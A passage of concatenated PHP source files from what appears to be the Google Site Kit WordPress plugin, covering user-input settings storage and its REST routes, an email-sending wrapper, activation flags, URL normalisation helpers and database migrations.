1.90.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.90.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.90.0 * * @return Closure */ protected function get_sanitize_callback() { $questions = array_filter( User_Input::get_questions(), function ( $question ) { return static::SCOPE === $question['scope']; } ); return function ( $settings ) use ( $questions ) { if ( ! is_array( $settings ) ) { return $this->get(); } $results = array(); foreach ( $settings as $setting_key => $setting_values ) { // Ensure all the data is valid. if ( ! in_array( $setting_key, array_keys( $questions ), true ) || ! is_array( $setting_values ) || static::SCOPE !== $setting_values['scope'] || ! is_array( $setting_values['values'] ) ) { continue; } $valid_values = array(); $valid_values['scope'] = $setting_values['scope']; $valid_answers = array(); // Verify that each answer value is a string. foreach ( $setting_values['values'] as $answer ) { if ( is_scalar( $answer ) ) { $valid_answers[] = $answer; } } $valid_values['values'] = $valid_answers; if ( ! empty( $valid_values ) ) { $results[ $setting_key ] = $valid_values; } } return $results; }; } } <?php /** * Class Google\Site_Kit\Core\User_Input\User_Input * * @package Google\Site_Kit\Core\User_Input * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Input; use ArrayAccess; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait; use Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics; use Google\Site_Kit\Core\User_Surveys\Survey_Queue; use WP_Error; use WP_User; /** * Class for handling User Input settings. * * @since 1.90.0 * @access private * @ignore */ class User_Input implements Provides_Feature_Metrics { use Feature_Metrics_Trait; /** * Site_Specific_Answers instance. * * @since 1.90.0 * @var Site_Specific_Answers */ protected $site_specific_answers; /** * User_Options instance. * * @since 1.90.0 * @var User_Options */ protected $user_options; /** * User_Specific_Answers instance. * * @since 1.90.0 * @var User_Specific_Answers */ protected $user_specific_answers; /** * REST_User_Input_Controller instance. * * @since 1.90.0 * @var REST_User_Input_Controller */ protected $rest_controller; /** * User Input questions. * * @since 1.90.0 * @var array|ArrayAccess */ private static $questions = array( 'purpose' => array( 'scope' => 'site', ), 'postFrequency' => array( 'scope' => 'user', ), 'goals' => array( 'scope' => 'user', ), 'includeConversionEvents' => array( 'scope' => 'site', ), ); /** * Constructor. * * @since 1.90.0 * * @param Context $context Plugin context. * @param Options $options Optional. Options instance. Default a new instance. * @param User_Options $user_options Optional. User_Options instance. Default a new instance. * @param Survey_Queue $survey_queue Optional. Survey_Queue instance. Default a new instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null, ?Survey_Queue $survey_queue = null ) { $this->site_specific_answers = new Site_Specific_Answers( $options ?: new Options( $context ) ); $this->user_options = $user_options ?: new User_Options( $context ); $this->user_specific_answers = new User_Specific_Answers( $this->user_options ); $this->rest_controller = new REST_User_Input_Controller( $this, $survey_queue ?: new Survey_Queue( $this->user_options ), new Key_Metrics_Setup_Completed_By( $options ?: new Options( $context ) ) ); } /** * Registers functionality. * * @since 1.90.0 */ public function register() { $this->site_specific_answers->register(); $this->user_specific_answers->register(); $this->rest_controller->register(); $this->register_feature_metrics(); } /** * Gets the set of user input questions. * * @since 1.90.0 * * @return array The user input questions. */ public static function get_questions() { return static::$questions; } /** * Gets user input answers. * * @since 1.90.0 * * @return array|WP_Error User input answers. */ public function get_answers() { $questions = static::$questions; $site_answers = $this->site_specific_answers->get(); $user_answers = $this->user_specific_answers->get(); $settings = array_merge( is_array( $site_answers ) ? $site_answers : array(), is_array( $user_answers ) ? $user_answers : array() ); // If there are no settings, return default empty values. if ( empty( $settings ) ) { array_walk( $questions, function ( &$question ) { $question['values'] = array(); } ); return $questions; } foreach ( $settings as &$setting ) { if ( ! isset( $setting['answeredBy'] ) ) { continue; } $answered_by = intval( $setting['answeredBy'] ); if ( ! $answered_by || $answered_by === $this->user_options->get_user_id() ) { continue; } $setting['author'] = array( 'photo' => get_avatar_url( $answered_by ), 'login' => ( new WP_User( $answered_by ) )->user_login, ); } // If there are un-answered questions, return default empty values for them. foreach ( $questions as $question_key => $question_value ) { if ( ! isset( $settings[ $question_key ] ) ) { $settings[ $question_key ] = $question_value; $settings[ $question_key ]['values'] = array(); } } return $settings; } /** * Determines whether the current user input settings have empty values or not. * * @since 1.90.0 * * @param array $settings The settings to check. * @return boolean|null TRUE if at least one of the settings has empty values, otherwise FALSE. */ public function are_settings_empty( $settings = array() ) { if ( empty( $settings ) ) { $settings = $this->get_answers(); if ( is_wp_error( $settings ) ) { return null; } } // Conversion events may be empty during setup if no events have been detected. // Since this setting does not affect whether user input is considered "set up", // we are excluding it from this check. It relates to user input initially being // set up with detected events or events added later. unset( $settings['includeConversionEvents'] ); foreach ( $settings as $setting ) { if ( empty( $setting['values'] ) ) { return true; } } return false; } /** * Sets user input answers. * * @since 1.90.0 * * @param array $settings User settings. * @return array|WP_Error User input answers. */ public function set_answers( $settings ) { $site_settings = array(); $user_settings = array(); foreach ( $settings as $setting_key => $answers ) { $setting_data = array(); $setting_data['values'] = $answers; $setting_data['scope'] = static::$questions[ $setting_key ]['scope']; if ( 'site' === $setting_data['scope'] ) { $existing_answers = $this->get_answers(); $answered_by = $this->user_options->get_user_id(); if ( // If the answer to the "purpose" question changed, // attribute the answer to the current user changing the // answer. ( ! empty( $existing_answers['purpose']['values'] ) && ! empty( array_diff( $existing_answers['purpose']['values'], $answers ) ) ) || // If the answer to the "purpose" question was empty, // attribute the answer to the current user. empty( $existing_answers['purpose']['answeredBy'] ) ) { $answered_by = $this->user_options->get_user_id(); } else { // Otherwise, attribute the answer to the user who answered // the question previously. $answered_by = $existing_answers['purpose']['answeredBy']; } $setting_data['answeredBy'] = $answered_by; $site_settings[ $setting_key ] = $setting_data; } elseif ( 'user' === $setting_data['scope'] ) { $user_settings[ $setting_key ] = $setting_data; } } $this->site_specific_answers->set( $site_settings ); $this->user_specific_answers->set( $user_settings ); return $this->get_answers(); } /** * Gets an array of internal feature metrics. * * @since 1.163.0 * * @return array */ public function get_feature_metrics() { return array( 'site_purpose' => $this->site_specific_answers->get()['purpose']['values'] ?? array(), ); } } <?php /** * Class Google\Site_Kit\Core\User_Input\REST_User_Input_Controller * * @package Google\Site_Kit\Core\User_Input * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Input; use Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\User_Surveys\Survey_Queue; use Google\Site_Kit\Core\Util\Feature_Flags; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling User Input settings rest routes. * * @since 1.90.0 * @access private * @ignore */ class REST_User_Input_Controller { /** * User_Input instance. * * @since 1.90.0 * @var User_Input */ protected $user_input; /** * Survey_Queue instance. * * @since 1.104.0 * @var Survey_Queue */ protected $survey_queue; /** * Key_Metrics_Setup_Completed_By instance. * * @since 1.113.0 * @var Key_Metrics_Setup_Completed_By */ protected $key_metrics_setup_completed_by; /** * Constructor. * * @since 1.90.0 * * @param User_Input $user_input User_Input instance. * @param Survey_Queue $survey_queue Survey_Queue instance. * @param Key_Metrics_Setup_Completed_By $key_metrics_setup_completed_by Key_Metrics_Setup_Completed_By instance. */ public function __construct( User_Input $user_input, Survey_Queue $survey_queue, Key_Metrics_Setup_Completed_By $key_metrics_setup_completed_by ) { $this->user_input = $user_input; $this->survey_queue = $survey_queue; $this->key_metrics_setup_completed_by = $key_metrics_setup_completed_by; } /** * Registers functionality. * * @since 1.90.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/user-input-settings', ) ); } ); } /** * Gets related REST routes. * * @since 1.90.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { return array( new REST_Route( 'core/user/data/user-input-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $response = rest_ensure_response( $this->user_input->get_answers() ); // Iterating over each setting in the response data to remove the 'author' key. // We use pass-by-reference (&$setting) to directly modify the original $response data. // This is done to ensure that if the current user doesn't have the `list_users` capability, // they won't be able to see the `{setting}.author` key of each answer object. if ( ! current_user_can( 'list_users' ) ) { foreach ( $response->data as &$setting ) { if ( isset( $setting['author'] ) ) { unset( $setting['author'] ); } } } return $response; }, 'permission_callback' => function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }, ), array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request->get_param( 'data' ); if ( ! isset( $data['settings'] ) || ! is_array( $data['settings'] ) ) { return new WP_Error( 'rest_missing_callback_param', __( 'Missing settings data.', 'google-site-kit' ), array( 'status' => 400 ) ); } $answers = $this->user_input->set_answers( $data['settings'] ); if ( ! empty( $answers['purpose']['values'] ) ) { $key_metrics_setup_already_done_by_user = $this->key_metrics_setup_completed_by->get(); if ( empty( $key_metrics_setup_already_done_by_user ) ) { $current_user_id = get_current_user_id(); $this->key_metrics_setup_completed_by->set( $current_user_id ); } } $response = rest_ensure_response( $answers ); if ( $response instanceof WP_REST_Response ) { $this->survey_queue->dequeue( 'user_input_answered_other_survey' ); } return $response; }, 'permission_callback' => function () { return current_user_can( Permissions::AUTHENTICATE ); }, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'questions' => array_fill_keys( array_keys( User_Input::get_questions() ), array( 'type' => 'array', 'items' => array( 'type' => 'string' ), ) ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\User_Input\Site_Specific_Answers * * @package Google\Site_Kit\Core\User_Input * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User_Input; use Google\Site_Kit\Core\Storage\Setting; /** * Class for handling the site specific answers in User Input. * * @since 1.90.0 * @access private * @ignore */ class Site_Specific_Answers extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_user_input_settings'; /** * The scope for which the answers are handled by this class. */ const SCOPE = 'site'; /** * Gets the expected value type. * * @since 1.90.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.90.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.90.0 * * @return callable Callback method that filters or type casts invalid setting values. */ protected function get_sanitize_callback() { $questions = array_filter( User_Input::get_questions(), function ( $question ) { return static::SCOPE === $question['scope']; } ); return function ( $settings ) use ( $questions ) { if ( ! is_array( $settings ) ) { return $this->get(); } $results = array(); foreach ( $settings as $setting_key => $setting_values ) { // Ensure all the data is valid. if ( ! in_array( $setting_key, array_keys( $questions ), true ) || ! is_array( $setting_values ) || static::SCOPE !== $setting_values['scope'] || ! is_array( $setting_values['values'] ) || ! is_int( $setting_values['answeredBy'] ) ) { continue; } $valid_values = array(); $valid_values['scope'] = $setting_values['scope']; $valid_values['answeredBy'] = $setting_values['answeredBy']; $valid_answers = array(); // Verify that each answer value is a string. foreach ( $setting_values['values'] as $answer ) { if ( is_scalar( $answer ) ) { $valid_answers[] = $answer; } } $valid_values['values'] = $valid_answers; if ( ! empty( $valid_values ) ) { $results[ $setting_key ] = $valid_values; } } return $results; }; } } <?php /** * Class Google\Site_Kit\Core\Email\Email * * @package Google\Site_Kit\Core\Email * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email; use WP_Error; /** * Class for sending emails with Site Kit branding. * * @since 1.168.0 * @access private * @ignore */ class Email { /** * Stores the last error from wp_mail. * * @since 1.168.0 * @var WP_Error|null */ protected $last_error = null; /** * Builds email headers with Site Kit branding. * * Fetches the filtered From email via wp_mail_from filter, * overrides the From name to "Site Kit", and merges with * caller-supplied headers. * * @since 1.168.0 * * @param array $headers Optional. Additional headers to merge. Default empty array. * @return array Final header array with Site Kit branding. */ public function build_headers( $headers = array() ) { $from_email = apply_filters( 'wp_mail_from', '' ); if ( empty( $from_email ) || ! is_email( $from_email ) ) { $from_email = get_option( 'admin_email' ); } $from_header = sprintf( 'From: Site Kit <%s>', $from_email ); if ( ! is_array( $headers ) ) { $headers = array(); } // Merge the From header with caller-supplied headers. // Place the From header first. $final_headers = array_merge( array( $from_header ), $headers ); return $final_headers; } /** * Sends an email using wp_mail with error tracking. * * Wraps wp_mail with a scoped listener for wp_mail_failed hook * to capture any errors during sending. When text_content is provided, * it will be set as the AltBody for multipart/alternative MIME emails. * * @since 1.168.0 * @since 1.170.0 Added $text_content parameter for plain text alternative. * * @param string|array $to Array or comma-separated list of email addresses to send message. * @param string $subject Email subject. * @param string $content Message contents (HTML). * @param array $headers Optional. Additional headers. Default empty array. * @param string $text_content Optional. Plain text alternative content. Default empty string. * @return bool|WP_Error True if the email was sent successfully, WP_Error on failure. */ public function send( $to, $subject, $content, $headers = array(), $text_content = '' ) { $this->last_error = null; $result = $this->send_email_and_catch_errors( $to, $subject, $content, $headers, $text_content ); if ( false === $result || $this->last_error instanceof WP_Error ) { if ( $this->last_error instanceof WP_Error ) { return $this->last_error; } $this->set_last_error( new WP_Error( 'wp_mail_failed', __( 'Failed to send email.', 'google-site-kit' ) ) ); return $this->last_error; } return true; } /** * Sends an email via wp_mail while capturing any errors. * * Attaches a temporary listener to the wp_mail_failed hook to capture * any errors that occur during sending. When text_content is provided, * uses phpmailer_init hook to set AltBody for multipart MIME emails. * * @since 1.168.0 * @since 1.170.0 Added $text_content parameter for plain text alternative. * * @param string|array $to Array or comma-separated list of email addresses to send message. * @param string $subject Email subject. * @param string $content Message contents (HTML). * @param array $headers Additional headers. * @param string $text_content Optional. Plain text alternative content. Default empty string. * @return bool Whether the email was sent successfully. */ protected function send_email_and_catch_errors( $to, $subject, $content, $headers, $text_content = '' ) { add_action( 'wp_mail_failed', array( $this, 'set_last_error' ) ); // Set up AltBody for multipart MIME email if text content is provided. $alt_body_callback = null; if ( ! empty( $text_content ) ) { $alt_body_callback = function ( $phpmailer ) use ( $text_content ) { // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase -- PHPMailer property. $phpmailer->AltBody = $text_content; }; add_action( 'phpmailer_init', $alt_body_callback ); } $result = wp_mail( $to, $subject, $content, $headers ); // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.wp_mail_wp_mail // Clean up hooks. remove_action( 'wp_mail_failed', array( $this, 'set_last_error' ) ); if ( null !== $alt_body_callback ) { remove_action( 'phpmailer_init', $alt_body_callback ); } return $result; } /** * Sets the last error from a failed email attempt. * * This method is public because it is used as a callback for the * wp_mail_failed hook which requires public accessibility. * * @since 1.168.0 * * @param WP_Error $error The error from wp_mail_failed hook. */ public function set_last_error( WP_Error $error ) { $this->last_error = $error; } /** * Gets the last error from the most recent send attempt. * * @since 1.168.0 * * @return WP_Error|null The last error if one occurred, null otherwise. */ public function get_last_error() { return $this->last_error; } } <?php /** * Class Google\Site_Kit\Core\Util\Activation_Flag * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\Options; /** * Class handling plugin activation. * * @since 1.10.0 * @access private * @ignore */ final class Activation_Flag { const OPTION_SHOW_ACTIVATION_NOTICE = 'googlesitekit_show_activation_notice'; const OPTION_NEW_SITE_POSTS = 'googlesitekit_new_site_posts'; /** * Plugin context. * * @since 1.10.0 * @var Context */ private $context; /** * Option API instance. * * @since 1.10.0 * @var Options */ protected $options; /** * Constructor. * * @since 1.10.0 * * @param Context $context Plugin context. * @param Options $options Optional. The Option API instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.10.0 */ public function register() { add_action( 'googlesitekit_activation', function ( $network_wide ) { // Set activation flag. $this->set_activation_flag( $network_wide ); } ); add_filter( 'googlesitekit_admin_data', function ( $data ) { return $this->inline_js_admin_data( $data ); } ); } /** * Sets the flag that the plugin has just been activated. * * @since 1.10.0 Migrated from Activation class. * * @param bool $network_wide Whether the plugin is being activated network-wide. */ public function set_activation_flag( $network_wide ) { if ( $network_wide ) { update_network_option( null, self::OPTION_SHOW_ACTIVATION_NOTICE, '1' ); return; } update_option( self::OPTION_SHOW_ACTIVATION_NOTICE, '1', false ); } /** * Gets the flag that the plugin has just been activated. * * @since 1.10.0 Migrated from Activation class. * * @param bool $network_wide Whether to check the flag network-wide. * @return bool True if just activated, false otherwise. */ public function get_activation_flag( $network_wide ) { if ( $network_wide ) { return (bool) get_network_option( null, self::OPTION_SHOW_ACTIVATION_NOTICE ); } return (bool) get_option( self::OPTION_SHOW_ACTIVATION_NOTICE ); } /** * Deletes the flag that the plugin has just been activated. * * @since 1.10.0 Migrated from Activation class. * * @param bool $network_wide Whether the plugin is being activated network-wide. */ public function delete_activation_flag( $network_wide ) { if ( $network_wide ) { delete_network_option( null, self::OPTION_SHOW_ACTIVATION_NOTICE ); return; } delete_option( self::OPTION_SHOW_ACTIVATION_NOTICE ); } /** * Modifies the admin data to pass to JS. * * @since 1.10.0 Migrated from Activation class. * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_admin_data( $data ) { $data['newSitePosts'] = $this->options->get( self::OPTION_NEW_SITE_POSTS ); return $data; } } <?php /** * Trait Google\Site_Kit\Core\Util\Google_URL_Matcher_Trait * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Trait for matching URLs and domains for Google Site Verification and Search Console. * * @since 1.6.0 * @access private * @ignore */ trait Google_URL_Matcher_Trait { /** * Compares two URLs for whether they qualify for a Site Verification or Search Console URL match. * * In order for the URLs to be considered a match, they have to be fully equal, except for a potential * trailing slash in one of them, which will be ignored. * * @since 1.6.0 * * @param string $url The URL. * @param string $compare The URL to compare. * @return bool True if the URLs are considered a match, false otherwise. */ protected function is_url_match( $url, $compare ) { $url = untrailingslashit( $url ); $compare = untrailingslashit( $compare ); $url_normalizer = new Google_URL_Normalizer(); $url = $url_normalizer->normalize_url( $url ); $compare = $url_normalizer->normalize_url( $compare ); return $url === $compare; } /** * Compares two domains for whether they qualify for a Site Verification or Search Console domain match. * * The value to compare may be either a domain or a full URL. If the latter, its scheme and a potential trailing * slash will be stripped out before the comparison. * * In order for the comparison to be considered a match then, the domains have to fully match, except for a * potential "www." prefix, which will be ignored. If the value to compare is a full URL and includes a path other * than just a trailing slash, it will not be a match. * * @since 1.6.0 * * @param string $domain A domain. * @param string $compare The domain or URL to compare. * @return bool True if the URLs/domains are considered a match, false otherwise. */ protected function is_domain_match( $domain, $compare ) { $domain = $this->strip_domain_www( $domain ); $compare = $this->strip_domain_www( $this->strip_url_scheme( untrailingslashit( $compare ) ) ); $url_normalizer = new Google_URL_Normalizer(); $domain = $url_normalizer->normalize_url( $domain ); $compare = $url_normalizer->normalize_url( $compare ); return $domain === $compare; } /** * Strips the scheme from a URL. * * @since 1.6.0 * * @param string $url URL with or without scheme. * @return string The passed $url without its scheme. */ protected function strip_url_scheme( $url ) { return preg_replace( '#^(\w+:)?//#', '', $url ); } /** * Strips the "www." prefix from a domain. * * @since 1.6.0 * * @param string $domain Domain with or without "www." prefix. * @return string The passed $domain without "www." prefix. */ protected function strip_domain_www( $domain ) { return preg_replace( '/^www\./', '', $domain ); } } <?php /** * Trait Google\Site_Kit\Core\Util\Migrate_Legacy_Keys * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Trait for a class that migrates array keys from old to new. * * @since 1.2.0 * @access private * @ignore */ trait Migrate_Legacy_Keys { /** * Migrates legacy array keys to the current key. * * @since 1.2.0 * * @param array $legacy_array Input associative array to migrate keys for. * @param array $key_mapping Map of legacy key to current key. * @return array Updated array. */ protected function migrate_legacy_keys( array $legacy_array, array $key_mapping ) { foreach ( $key_mapping as $legacy_key => $current_key ) { if ( ! isset( $legacy_array[ $current_key ] ) && isset( $legacy_array[ $legacy_key ] ) ) { $legacy_array[ $current_key ] = $legacy_array[ $legacy_key ]; } unset( $legacy_array[ $legacy_key ] ); } return $legacy_array; } } <?php /** * Migration for 1.3.0 * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Tracking\Tracking_Consent; /** * Class Migration_1_3_0 * * @since 1.3.0 * @access private * @ignore */ class Migration_1_3_0 { /** * Target DB version. */ const DB_VERSION = '1.3.0'; /** * Context instance. * * @var Context */ protected $context; /** * Options instance. * * @var Options */ protected $options; /** * User_Options instance. * * @var User_Options */ protected $user_options; /** * Constructor. * * @since 1.3.0 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. * @param User_Options $user_options Optional. User_Options instance. */ public function __construct( Context $context, ?Options $options = null, ?User_Options $user_options = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->user_options = $user_options ?: new User_Options( $context ); } /** * Registers hooks. * * @since 1.3.0 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.3.0 */ public function migrate() { $db_version = $this->options->get( 'googlesitekit_db_version' ); if ( ! $db_version || version_compare( $db_version, self::DB_VERSION, '<' ) ) { $this->migrate_tracking_opt_in(); $this->options->set( 'googlesitekit_db_version', self::DB_VERSION ); } } /** * Migrates the global tracking opt-in to a user option. * * @since 1.3.0 * @since 1.4.0 Migrates preference for up to 20 users. */ private function migrate_tracking_opt_in() { // Only migrate if tracking was opted-in. if ( $this->options->get( Tracking_Consent::OPTION ) ) { $backup_user_id = $this->user_options->get_user_id(); foreach ( $this->get_authenticated_users() as $user_id ) { $this->user_options->switch_user( $user_id ); $this->user_options->set( Tracking_Consent::OPTION, 1 ); } $this->user_options->switch_user( $backup_user_id ); } } /** * Gets the authenticated users connected to Site Kit. * * @since 1.4.0 * * @return string[] User IDs of authenticated users. Maximum of 20. */ private function get_authenticated_users() { return get_users( array( 'meta_key' => $this->user_options->get_meta_key( OAuth_Client::OPTION_ACCESS_TOKEN ), // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key 'meta_compare' => 'EXISTS', 'number' => 20, 'fields' => 'ID', ) ); } } <?php /** * Migration for Conversion ID. * * @package Google\Site_Kit\Core\Util * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Modules\Analytics_4\Settings as Analytics_Settings; use Google\Site_Kit\Modules\Ads; use Google\Site_Kit\Modules\Ads\Settings as Ads_Settings; /** * Class Migration_1_129_0 * * @since 1.129.0 * @access private * @ignore */ class Migration_1_129_0 { /** * Target DB version. */ const DB_VERSION = '1.129.0'; /** * DB version option name. */ const DB_VERSION_OPTION = 'googlesitekit_db_version'; /** * Context instance. * * @since 1.129.0 * @var Context */ protected $context; /** * Options instance. * * @since 1.129.0 * @var Options */ protected $options; /** * Analytics_Settings instance. * * @since 1.129.0 * @var Analytics_Settings */ protected $analytics_settings; /** * Ads_Settings instance. * * @since 1.129.0 * @var Ads_Settings */ protected $ads_settings; /** * Constructor. * * @since 1.129.0 * * @param Context $context Plugin context instance. * @param Options $options Optional. Options instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $context ); $this->analytics_settings = new Analytics_Settings( $this->options ); $this->ads_settings = new Ads_Settings( $this->options ); } /** * Registers hooks. * * @since 1.129.0 */ public function register() { add_action( 'admin_init', array( $this, 'migrate' ) ); } /** * Migrates the DB. * * @since 1.129.0 */ public function migrate() { $db_version = $this->options->get( self::DB_VERSION_OPTION ); if ( ! $db_version || version_compare( $db_version, self::DB_VERSION, '<' ) ) { $this->migrate_analytics_conversion_id_setting(); $this->activate_ads_module(); $this->options->set( self::DB_VERSION_OPTION, self::DB_VERSION ); } } /** * Migrates the Ads Conversion ID to the new Ads module. * * @since 1.129.0 */ protected function migrate_analytics_conversion_id_setting() { if ( ! $this->analytics_settings->has() ) { return; } $analytics_settings = $this->analytics_settings->get(); if ( empty( $analytics_settings ) || ! array_key_exists( 'adsConversionID', $analytics_settings ) || empty( $analytics_settings['adsConversionID'] ) ) { return; } $ads_settings = $this->ads_settings->get(); if ( array_key_exists( 'conversionID', $ads_settings ) && ! empty( $ads_settings['conversionID'] ) ) { // If there is already an adsConversionID set in the Ads module, do not overwrite it, remove it from the Analytics module. unset( $analytics_settings['adsConversionID'] ); $this->analytics_settings->set( $analytics_settings ); return; } $ads_settings['conversionID'] = $analytics_settings['adsConversionID']; $this->ads_settings->set( $ads_settings ); unset( $analytics_settings['adsConversionID'] ); $analytics_settings['adsConversionIDMigratedAtMs'] = time() * 1000; $this->analytics_settings->set( $analytics_settings ); } /** * Activates the ads module if the Ads Conversion ID was previously set. * * @since 1.129.0 */ protected function activate_ads_module() { $active_modules = $this->options->get( Modules::OPTION_ACTIVE_MODULES ); if ( is_array( $active_modules ) && in_array( 'ads', $active_modules, true ) ) { return; } $ads_settings = $this->ads_settings->get(); // Activate the Ads module if the Ads Conversion ID was previously set // and the Ads module is not already active. if ( ! empty( $ads_settings['conversionID'] ) ) { $active_modules[] = Ads::MODULE_SLUG; $this->options->set( Modules::OPTION_ACTIVE_MODULES, $active_modules ); } } } <?php /** * Class Google\Site_Kit\Core\Util\Google_URL_Normalizer * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class handling URL normalization for comparisons and API requests. * * @since 1.18.0 * @access private * @ignore */ final class Google_URL_Normalizer { /** * Normalizes a URL by converting to all lowercase, converting Unicode characters * to punycode, and removing bidirectional control characters. * * @since 1.18.0 * * @param string $url The URL or domain to normalize. * @return string The normalized URL or domain. */ public function normalize_url( $url ) { // Remove bidirectional control characters. $url = preg_replace( array( '/\xe2\x80\xac/', '/\xe2\x80\xab/' ), '', $url ); $url = $this->decode_unicode_url_or_domain( $url ); $url = strtolower( $url ); return $url; } /** * Returns the Punycode version of a Unicode URL or domain name. * * @since 1.18.0 * * @param string $url The URL or domain name to decode. */ protected function decode_unicode_url_or_domain( $url ) { $encoder_class = class_exists( '\WpOrg\Requests\IdnaEncoder' ) ? '\WpOrg\Requests\IdnaEncoder' : '\Requests_IDNAEncoder'; $parts = URL::parse( $url ); if ( ! $parts || ! isset( $parts['host'] ) || '' === $parts['host'] ) { return $encoder_class::encode( $url ); } $decoded_host = $encoder_class::encode( $parts['host'] ); return str_replace( $parts['host'], $decoded_host, $url ); } } <?php /** * Class Google\Site_Kit\Core\Util\Collection_Key_Cap_Filter * * @package Google\Site_Kit\Core\Util * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class for filtering a specific key of a collection based on a capability. * * @since 1.77.0 * @access private * @ignore */ class Collection_Key_Cap_Filter { /** * Collection key. * * @since 1.77.0 * @var string */ private $key; /** * Capability. * * @since 1.77.0 * @var string */ private $cap; /** * Constructor. * * @since 1.77.0. * * @param string $key Target collection key to filter. * @param string $capability Required capability to filter by. */ public function __construct( $key, $capability ) { $this->key = $key; $this->cap = $capability; } /** * Filters the given value of a specific key in each item of the given collection * based on the key and capability. * * @since 1.77.0 * * @param array[] $collection Array of arrays. * @return array[] Filtered collection. */ public function filter_key_by_cap( array $collection ) { foreach ( $collection as $meta_arg => &$value ) { if ( ! current_user_can( $this->cap, $meta_arg ) ) { unset( $value[ $this->key ] ); } } return $collection; } } <?php /** * Class Google\Site_Kit\Core\Util\Entity_Factory * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Plugin; use WP_Query; use WP_Post; use WP_Term; use WP_User; use WP_Post_Type; use WP_Screen; /** * Class providing access to entities. * * This class entirely relies on WordPress core behavior and is technically decoupled from Site Kit. For example, * entities returned by this factory rely on 